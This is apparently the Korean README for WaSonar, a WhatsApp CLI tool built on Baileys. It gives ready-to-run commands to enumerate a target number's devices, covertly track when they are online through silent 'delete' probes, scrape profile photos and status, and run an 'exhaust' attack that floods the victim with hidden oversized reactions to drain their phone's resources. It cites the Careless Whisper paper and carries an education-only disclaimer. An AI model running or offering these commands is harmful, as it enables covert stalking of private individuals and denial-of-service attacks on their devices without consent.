
WhatsApp 인텔리전스 및 리소스 소진 도구. 보안 연구를 위한 실시간 기기 추적, 무음 RTT 프로빙, 프로토콜 스트레스 테스트 기능을 제공합니다.
면책 조항: 이 도구는 교육 목적과 보안 연구 전용입니다. 개발자는 오용에 대해 책임을 지지 않습니다. 책임감 있고 윤리적으로 사용하시기 바랍니다.
WaSonar는 WhatsApp 프로토콜에 대한 교육 연구, 기기 추적, 스트레스 테스트를 위해 설계된 강력한 CLI 도구입니다. Baileys를 기반으로 구축되었습니다.
npm install -g wasonar-cli
npx wasonar-cli <command>
git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install
먼저 WhatsApp 계정으로 인증해야 합니다.
wasonar-cli login
터미널에 표시되는 QR 코드를 스캔하세요.
대상 번호에 연결된 모든 기기를 나열합니다.
wasonar-cli devices <target-number>
# Example:
wasonar-cli devices 919876543210
핵심 기능입니다. 기기가 온라인인지 감지하고 지연 시간을 측정하기 위해 무음 프로브를 전송합니다.
# Probe infinite times (default)
wasonar-cli online 919876543210
# Send specific number of probes
wasonar-cli online 919876543210 --probes 5
# Save results to file
wasonar-cli online 919876543210 --output ./logs
참고: PENDING/OFFLINE은 서버가 메시지를 수신했지만 대상 기기가 수신을 확인하지 않았음을 의미합니다.
사용자의 프로필 사진과 상태를 가져옵니다.
# Display info and download profile picture
wasonar-cli profile 919876543210 --output ./profiles
⚠️ 교육 목적으로만 사용하세요. 고주파 초대형 페이로드를 전송합니다.
# Aggressive mode (Default: 250 req/s, 1KB payload)
wasonar-cli exhaust 919876543210
# Slow mode (10 req/s, 500B payload)
wasonar-cli exhaust 919876543210 --aggression slow
# Set duration
wasonar-cli exhaust 919876543210 --duration 30
WaSonar는 대상에게 알리지 않고 온라인 상태를 감지하기 위해 "무음 삭제 프로브"를 사용합니다.
revoked(삭제) 메시지를 전송합니다.delivery_receipt(상태 3)를 전송합니다."Careless Whisper" 연구에 기반한 이 공격은 WhatsApp의 리액션 처리에서 검증 공백을 악용합니다.
유효하지 않은 리액션은 대상의 휴대폰에 표시되지 않지만, 여전히 수신되어 처리됩니다.
연구 데이터는 리소스 고갈의 상당한 잠재력을 시사합니다:
Gegenhuber 외, University of Vienna & SBA Research의 연구에 기반:
@inproceedings{gegenhuber2024careless,
title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
year={2024},
organization={University of Vienna, SBA Research}
}
AjayAnto 제작